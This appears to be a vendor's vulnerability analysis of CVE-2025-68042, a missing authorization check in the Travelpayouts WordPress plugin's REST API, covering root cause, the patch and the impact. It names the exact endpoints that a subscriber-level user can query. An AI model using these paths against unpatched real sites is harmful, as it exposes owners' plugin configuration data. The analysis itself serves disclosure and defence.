– Proof of Concept - Atomic Edge

Atomic Edge analysis of CVE-2025-68042:
This vulnerability is a missing authorization flaw in the Travelpayouts WordPress plugin. The plugin’s REST API endpoints lacked proper capability checks, allowing any authenticated user, including subscribers, to perform administrative actions. The CVSS score of 4.3 reflects the authenticated nature of the attack.

Root Cause:
The vulnerability existed in the `rest_api_init` method of the `Travelpayouts_REST_API_Builder` class. Three REST API routes registered in `/travelpayouts/redux-core/inc/classes/class-travelpayouts-rest-api-builder.php` used `’permission_callback’ => ‘__return_true’` (lines 60, 75, and 90 in the vulnerable version). This configuration granted unconditional access to the `/fields`, `/fields/(?P[w-_/]+)`, and `/fields/(?P[w-_/]+)/render` endpoints. The missing capability check allowed any authenticated WordPress user to invoke these administrative functions.

Exploitation:
An attacker with subscriber-level credentials could send GET requests to the vulnerable REST endpoints. The primary attack vector targets `/wp-json/travelpayouts/v1/fields` to list plugin configuration fields. Attackers could also access `/wp-json/travelpayouts/v1/fields/{id}` to retrieve specific field data and `/wp-json/travelpayouts/v1/fields/{id}/render` to render field components. No special parameters are required beyond authentication, as the vulnerability stems from the absence of authorization validation.

Patch Analysis:
The patch replaces the `’permission_callback’ => ‘__return_true’` statements with a capability check. Version 1.2.2 introduces a closure function `$perm` that calls `current_user_can(‘manage_options’)` (line 53). This function is assigned to all three REST route registrations (lines 60, 75, and 90). The fix restricts endpoint access to users with the `manage_options` capability, typically administrators only. The version constant in `/travelpayouts/definitions.php` was also updated from 1.2.1 to 1.2.2.

Impact:
Successful exploitation allows authenticated attackers with minimal privileges to access plugin configuration data through the REST API. This could expose sensitive plugin settings, widget configurations, and integration parameters. While the vulnerability does not directly enable privilege escalation or remote code execution, it violates the principle of least privilege and could facilitate reconnaissance for further attacks.